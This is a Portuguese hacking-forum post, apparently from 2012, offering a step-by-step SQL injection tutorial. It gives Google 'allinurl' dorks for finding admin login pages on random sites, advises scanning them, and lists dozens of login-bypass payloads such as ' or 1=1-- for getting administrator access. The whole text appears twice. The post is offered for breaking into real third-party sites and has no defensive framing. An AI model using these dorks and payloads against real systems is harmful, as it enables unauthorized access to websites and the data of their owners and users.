![[TUTORIAL]Aprendendo-sql-injection Passo a Passo Ofbya](https://2img.net/h/i.imgur.com/Ofbya.png)
Início[TUTORIAL]Aprendendo-sql-injection Passo a Passo
:: Área Hacker :: Tutoriais Hackers
Página 1 de 1
![[TUTORIAL]Aprendendo-sql-injection Passo a Passo Empty](https://2img.net/i/empty.gif)
[TUTORIAL]Aprendendo-sql-injection Passo a Passo
iHarD_3D Sáb Mar 03, 2012 5:29 pm
Bom galera vou explicar sql injection metodo de inserção de strings no servidor
assim liberando os cookies e consequantemente a permissao de adiministrador
bem devido a algums erros em banco de dados dos servidores
é possivel ainda hj encontrar esse tipo de vulnerabilidade
sql injection vem de injeção de sql ou seja strings em logins e campos de senhas
depedendo da pagina vulneravel
um aliado constante dessa vulnerabilidade é o site [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
que permite pesquisar por paginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.
Citação:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
pegue uma das strings acima e pesquise a vontade:
após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como acutinex
depois de scanniado e acuzando a suposta vulnerabilidade de sql injection
é só testarmos strings nos campos de loginsda pagina afetada.
Citação:
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
' or 'x'='x
assim liberando os cookies e consequantemente a permissao de adiministrador
bem devido a algums erros em banco de dados dos servidores
é possivel ainda hj encontrar esse tipo de vulnerabilidade
sql injection vem de injeção de sql ou seja strings em logins e campos de senhas
depedendo da pagina vulneravel
um aliado constante dessa vulnerabilidade é o site [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
que permite pesquisar por paginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.
Citação:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
pegue uma das strings acima e pesquise a vontade:
após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como acutinex
depois de scanniado e acuzando a suposta vulnerabilidade de sql injection
é só testarmos strings nos campos de loginsda pagina afetada.
Citação:
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
' or 'x'='x
iHarD_3D- Banido
- Mensagens : 33
Data de inscrição : 11/02/2012
Idade : 30
Localização : TODOS OS LUGARES -
Tópicos semelhantes» [TUTORIAL] Do uso do Sobeit
» [Tutorial] invasão de sites via FTP
» [TUTORIAL]Como Usar o Inuke 2.0
» [TUTORIAL]Como Zuar 1 Forum [PEDIDO]
» [Tutorial] invasão de sites via FTP
» [TUTORIAL]Como Usar o Inuke 2.0
» [TUTORIAL]Como Zuar 1 Forum [PEDIDO]
:: Área Hacker :: Tutoriais Hackers
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos